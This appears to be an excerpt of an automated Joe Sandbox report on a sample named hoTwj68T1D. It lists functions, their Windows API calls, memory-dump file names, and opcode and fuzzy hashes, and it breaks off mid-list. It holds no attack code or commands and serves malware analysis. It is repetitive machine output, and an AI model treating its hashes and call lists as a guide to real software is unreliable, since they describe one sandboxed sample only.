Instruction Fuzzy Hash: A6F03AA61915949E9F01DFA998D18E27FA99A0B30430CD0D6E9C8DF217C228DC81CBB8

Function 00425E18 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 26threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00425E2D
SetWindowsHookExA.USER32(00000003,00425DD4,00000000,00000000), ref: 00425E3D
CreateThread.KERNEL32(00000000,000003E8,00425D84,00000000,00000000), ref: 00425E61

Strings

j-, xrefs: 00425E24, 00425E42

Memory Dump Source

Source File: 00000001.00000002.2408498738.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2408481888.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408560019.000000000049E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408577291.00000000004A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408594136.00000000004A3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408611067.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408636240.00000000004D4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408689633.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408709176.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408727901.0000000000578000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408744459.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408766814.0000000000581000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408785417.0000000000584000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408804378.000000000058B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408821201.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408846219.00000000005BE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408866879.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_hoTwj68T1D.jbxd

Similarity

API ID: Thread$CreateCurrentHookWindows
String ID: j-
API String ID: 1053731214-2063475733
Opcode ID: e6c5b8ddaca1158374a8a62e2585a4b4ecb14b2c849a921c61e0a5f6e62de760
Instruction ID: 875978504f7a91e681f128cf09c73eca6f7379cff6b893b2cc38a97400a3df29
Opcode Fuzzy Hash: e6c5b8ddaca1158374a8a62e2585a4b4ecb14b2c849a921c61e0a5f6e62de760
Instruction Fuzzy Hash: 70E092B07827D0AEFB10A710FC07F122A5893B571DF54003BF1006E1D1C3BC6990862C

Function 004363D0 Relevance: 6.2, APIs: 4, Instructions: 224COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2408498738.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2408481888.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408560019.000000000049E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408577291.00000000004A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408594136.00000000004A3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408611067.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408636240.00000000004D4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408689633.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408709176.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408727901.0000000000578000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408744459.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408766814.0000000000581000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408785417.0000000000584000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408804378.000000000058B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408821201.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408846219.00000000005BE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408866879.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_hoTwj68T1D.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 180f127bf93fb3af4bce8e8c1140be519dea742f368edc650f74cb75784b9d20
Instruction ID: e272c47888e07854c7a2eabe8f75404fb296e6807bc93ef03f83ed457dcd717f
Opcode Fuzzy Hash: 180f127bf93fb3af4bce8e8c1140be519dea742f368edc650f74cb75784b9d20
Instruction Fuzzy Hash: 9FA17B74A0015AAFDB00DF58C5C5BEEB7F4AF09304F1980AAE914AB365C378ED55CB58

Function 00423BB8 Relevance: 6.1, APIs: 4, Instructions: 127windowCOMMON

Download Yara Rule

APIs

GetMenu.USER32(00000000), ref: 00423CA5
SetMenu.USER32(00000000,00000000), ref: 00423CC2
SetMenu.USER32(00000000,00000000), ref: 00423CF7
SetMenu.USER32(00000000,00000000), ref: 00423D13

Memory Dump Source

Source File: 00000001.00000002.2408498738.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2408481888.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408560019.000000000049E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408577291.00000000004A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408594136.00000000004A3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408611067.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408636240.00000000004D4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408689633.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408709176.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408727901.0000000000578000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408744459.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408766814.0000000000581000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408785417.0000000000584000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408804378.000000000058B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408821201.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408846219.00000000005BE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408866879.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_hoTwj68T1D.jbxd

Similarity

API ID: Menu
String ID:
API String ID: 3711407533-0
Opcode ID: 264b32031f1aa78a2f220adb6e136785068d8a4aedacbba4c60d9ba422485c48
Instruction ID: 949193dfd28cd686e9f32b70f6e79fb17e99aec78da3ccd9307a843ff392c469
Opcode Fuzzy Hash: 264b32031f1aa78a2f220adb6e136785068d8a4aedacbba4c60d9ba422485c48
Instruction Fuzzy Hash: 6741BB3170026457DB20EE3AA88579B26A48F45349F98057BBC45AF387CEBDCE4587AC

Function 00407D68 Relevance: 6.1, APIs: 4, Instructions: 95windowCOMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00400000,?,00000100), ref: 00407D89
LoadStringA.USER32(00400000,0000FF9E,?,00000040), ref: 00407DF8
LoadStringA.USER32(00400000,0000FF9F,?,00000040), ref: 00407E93
MessageBoxA.USER32(00000000,?,?,00002010), ref: 00407ED2

Memory Dump Source

Source File: 00000001.00000002.2408498738.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2408481888.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408560019.000000000049E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408577291.00000000004A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408594136.00000000004A3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408611067.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408636240.00000000004D4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408689633.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408709176.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408727901.0000000000578000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408744459.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408766814.0000000000581000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408785417.0000000000584000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408804378.000000000058B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408821201.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408846219.00000000005BE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408866879.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_hoTwj68T1D.jbxd

Similarity

API ID: LoadString$FileMessageModuleName
String ID:
API String ID: 704749118-0
Opcode ID: ab8c03c6ab258a03dfa8a90a00312fe8d63db5871f2dfe645395268fe903330f
Instruction ID: 4f426ca4a417ec3acfc3120e831b77e81af796622335ab53bd115f25a7d6263e
Opcode Fuzzy Hash: ab8c03c6ab258a03dfa8a90a00312fe8d63db5871f2dfe645395268fe903330f
Instruction Fuzzy Hash: ED3132716093845BD320EB65C945BDB77D89F86304F40483FB688D72D1DB7999088B6B

Function 0041E700 Relevance: 6.1, APIs: 4, Instructions: 80windowCOMMON

Download Yara Rule

APIs

GetEnhMetaFilePaletteEntries.GDI32(00000000,00000000,00000000), ref: 0041E736
DeleteObject.GDI32(00000000), ref: 0041E756
GetEnhMetaFilePaletteEntries.GDI32(00000000,00000000,-00000004,00000000,0041E7D8,?,00000000,00000000,00000000), ref: 0041E7A2
73EA6750.GDI32(00000000,00000000,00000000,-00000004,00000000,0041E7D8,?,00000000,00000000,00000000), ref: 0041E7AB

Memory Dump Source

Source File: 00000001.00000002.2408498738.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2408481888.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408560019.000000000049E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408577291.00000000004A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408594136.00000000004A3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408611067.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408636240.00000000004D4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408689633.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408709176.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408727901.0000000000578000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408744459.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408766814.0000000000581000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408785417.0000000000584000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408804378.000000000058B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408821201.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408846219.00000000005BE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408866879.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_hoTwj68T1D.jbxd

Similarity

API ID: EntriesFileMetaPalette$A6750DeleteObject
String ID:
API String ID: 3483046330-0
Opcode ID: 94cf3cf53645bfb918f066a1cc41db3e82dfa765d5dd88bea3ef22be5216e92f
Instruction ID: 81d0b6df47739d4297758823a2ba77c3b44b1f6939e771594f3afdb0e0ef8470
Opcode Fuzzy Hash: 94cf3cf53645bfb918f066a1cc41db3e82dfa765d5dd88bea3ef22be5216e92f
Instruction Fuzzy Hash: AE31EF79A00204AFEB14DF99C885E9EF7F4FB48304F5545A6E814EB791D638EE80CB64

Function 00417A80 Relevance: 6.1, APIs: 4, Instructions: 72COMMON

Download Yara Rule

APIs

GetCursorPos.USER32 ref: 00417AC8
SetCursor.USER32(00000000), ref: 00417B0B
GetLastActivePopup.USER32(?), ref: 00417B35
GetForegroundWindow.USER32(?), ref: 00417B3C

Memory Dump Source

Source File: 00000001.00000002.2408498738.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2408481888.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408560019.000000000049E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408577291.00000000004A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408594136.00000000004A3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408611067.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408636240.00000000004D4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408689633.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408709176.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408727901.0000000000578000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408744459.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408766814.0000000000581000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408785417.0000000000584000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408804378.000000000058B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408821201.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408846219.00000000005BE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408866879.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_hoTwj68T1D.jbxd

Similarity

API ID: Cursor$ActiveForegroundLastPopupWindow
String ID:
API String ID: 1959210111-0
Opcode ID: a243d514656ad96b6f807382e2412ab1f9ca619d77b398aa2d3fdac9883e78a0
Instruction ID: 57c8c2e47a1fb1c5c637a1dcf99b211d4756a3fd29f4e9f67142e737e6df68b1
Opcode Fuzzy Hash: a243d514656ad96b6f807382e2412ab1f9ca619d77b398aa2d3fdac9883e78a0
Instruction Fuzzy Hash: C5219F317086008BCB10AF29C989AEB37B1EF4876CF45446AE8589B352D77DECC1CB49

Function 004173AA Relevance: 6.1, APIs: 4, Instructions: 67windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(?,?,?,?), ref: 004173EC
SetTextColor.GDI32(?,00000000), ref: 00417406
SetBkColor.GDI32(?,00000000), ref: 00417420
CallWindowProcA.USER32(?,?,?,?,?), ref: 00417448

Memory Dump Source

Source File: 00000001.00000002.2408498738.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2408481888.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408560019.000000000049E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408577291.00000000004A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408594136.00000000004A3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408611067.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408636240.00000000004D4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408689633.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408709176.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408727901.0000000000578000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408744459.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408766814.0000000000581000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408785417.0000000000584000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408804378.000000000058B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408821201.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408846219.00000000005BE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408866879.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_hoTwj68T1D.jbxd

Similarity

API ID: Color$CallMessageProcSendTextWindow
String ID:
API String ID: 601730667-0
Opcode ID: 352bbdcd101519f16ffa7044557a5bd7b8a595cd21c2a70cabd53629485b4d72
Instruction ID: e3c6a2eeef90bdaca67ffcda0e2e4bac28c925924ab66262929662da23118501
Opcode Fuzzy Hash: 352bbdcd101519f16ffa7044557a5bd7b8a595cd21c2a70cabd53629485b4d72
Instruction Fuzzy Hash: E811EFB1604A04AFD710EEBECD81D9B77E8EF48314714886EB95ADB611C638E841CF69

Function 004355F0 Relevance: 6.1, APIs: 4, Instructions: 67windowCOMMON

Download Yara Rule

APIs

IsRectEmpty.USER32(?), ref: 004355FB
IsWindowVisible.USER32(00000000), ref: 00435623
SetWindowPos.USER32(00000000,00000000,?,?,?,?,00000048,?,?,?,?,004356FF,004399B0), ref: 0043565B
SetFocus.USER32(00000000,?,?,?,?,00000048,?,?,?,?,004356FF,004399B0), ref: 0043568C

Part of subcall function 00435590: IsWindowVisible.USER32(00000000), ref: 004355A6
Part of subcall function 00435590: SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,0000008C,00000000,?,0043985A,00439862,?,?,00435C9C,00437DE1), ref: 004355CD
Part of subcall function 00435590: SetFocus.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,0000008C,00000000,?,0043985A,00439862,?,?,00435C9C,00437DE1), ref: 004355E9

Memory Dump Source

Source File: 00000001.00000002.2408498738.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2408481888.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408560019.000000000049E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408577291.00000000004A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408594136.00000000004A3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408611067.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408636240.00000000004D4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408689633.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408709176.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408727901.0000000000578000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408744459.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408766814.0000000000581000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408785417.0000000000584000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408804378.000000000058B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408821201.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408846219.00000000005BE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408866879.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_hoTwj68T1D.jbxd

Similarity

API ID: Window$FocusVisible$EmptyRect
String ID:
API String ID: 698668684-0
Opcode ID: 081f43b9f7e5711ead179a0108ea1b7bbdd15d74c9e3884acb4365465dbe35b0
Instruction ID: ca23f139822b9eba934cb770c1d02dbe0658de2e10ea82211bbb84816b3449e0
Opcode Fuzzy Hash: 081f43b9f7e5711ead179a0108ea1b7bbdd15d74c9e3884acb4365465dbe35b0
Instruction Fuzzy Hash: 02118631300A016BC610BA7A8C82A7FB3CA9F49358F48142BF558CB356CE6CEC029759

Function 00426338 Relevance: 6.1, APIs: 4, Instructions: 55COMMON

Download Yara Rule

APIs

EnumWindows.USER32(Function_000262D0), ref: 0042635C
GetWindow.USER32(?,00000003), ref: 00426371
GetWindowLongA.USER32(?,000000EC), ref: 00426380
SetWindowPos.USER32(00000000,00426A10,00000000,00000000,00000000,00000000,00000013,?,000000EC,?,00000003,?,?,?,00426A5F,?), ref: 004263B6

Memory Dump Source

Source File: 00000001.00000002.2408498738.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2408481888.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408560019.000000000049E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408577291.00000000004A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408594136.00000000004A3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408611067.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408636240.00000000004D4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408689633.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408709176.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408727901.0000000000578000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408744459.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408766814.0000000000581000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408785417.0000000000584000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408804378.000000000058B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408821201.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408846219.00000000005BE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408866879.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_hoTwj68T1D.jbxd

Similarity

API ID: Window$EnumLongWindows
String ID:
API String ID: 4191631535-0
Opcode ID: 4b387a48cbf5106d2bb2ef3eb080e13593a9679e6c5e13660dcbe87468262c21
Instruction ID: f454b54af6b8d0b3730a56c508fd2dd257964bc8103f4074816be2b2588f4403
Opcode Fuzzy Hash: 4b387a48cbf5106d2bb2ef3eb080e13593a9679e6c5e13660dcbe87468262c21
Instruction Fuzzy Hash: 1A113C70704620AFDB10EF29EC85F5A77E4EB48724F51166AF954AB2E2C378DC40CB59

Function 00425A0C Relevance: 6.1, APIs: 4, Instructions: 54COMMON

Download Yara Rule

APIs

73E9A570.USER32(00000000), ref: 00425A62
EnumFontsA.GDI32(00000000,00000000,Function_000259AC,?,00000000), ref: 00425A75
73EA4620.GDI32(00000000,0000005A,00000000,00000000,Function_000259AC,?,00000000), ref: 00425A7D
73E9A480.USER32(00000000,00000000,00000000,0000005A,00000000,00000000,Function_000259AC,?,00000000), ref: 00425A88

Memory Dump Source

Source File: 00000001.00000002.2408498738.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2408481888.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408560019.000000000049E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408577291.00000000004A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408594136.00000000004A3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408611067.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408636240.00000000004D4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408689633.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408709176.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408727901.0000000000578000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408744459.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408766814.0000000000581000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408785417.0000000000584000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408804378.000000000058B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408821201.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408846219.00000000005BE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408866879.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_hoTwj68T1D.jbxd

Similarity

API ID: A4620A480A570EnumFonts
String ID:
API String ID: 178811091-0
Opcode ID: b81f7e1dd37653ee36840fe3f8f62573fc28412b2e8f2debba7a2f6364733037
Instruction ID: f3fae9aa360f3a5c2d234c72768e9958e0a23bca176825661db72b6807f2273d
Opcode Fuzzy Hash: b81f7e1dd37653ee36840fe3f8f62573fc28412b2e8f2debba7a2f6364733037
Instruction Fuzzy Hash: 870180B16056106AE711BF6A5CC2B9B3A54DF05318F00427AF808AF2C3D6BE9C0487AD

Function 0040C430 Relevance: 6.1, APIs: 4, Instructions: 51COMMON

Download Yara Rule

APIs

FindResourceA.KERNEL32(00400000,?,?), ref: 0040C447
LoadResource.KERNEL32(00400000,72756F73,00400000,?,?,00409AC8,00400000,00000001,00000000,?,0040C3A4,?), ref: 0040C461
SizeofResource.KERNEL32(00400000,72756F73,00400000,72756F73,00400000,?,?,00409AC8,00400000,00000001,00000000,?,0040C3A4,?), ref: 0040C47B
LockResource.KERNEL32(74536563,00000000,00400000,72756F73,00400000,72756F73,00400000,?,?,00409AC8,00400000,00000001,00000000,?,0040C3A4,?), ref: 0040C485

Memory Dump Source

Source File: 00000001.00000002.2408498738.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2408481888.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408560019.000000000049E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408577291.00000000004A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408594136.00000000004A3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408611067.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408636240.00000000004D4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408689633.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408709176.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408727901.0000000000578000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408744459.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408766814.0000000000581000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408785417.0000000000584000.00000040.00000001.01000000.00000003.sdmpDownload File
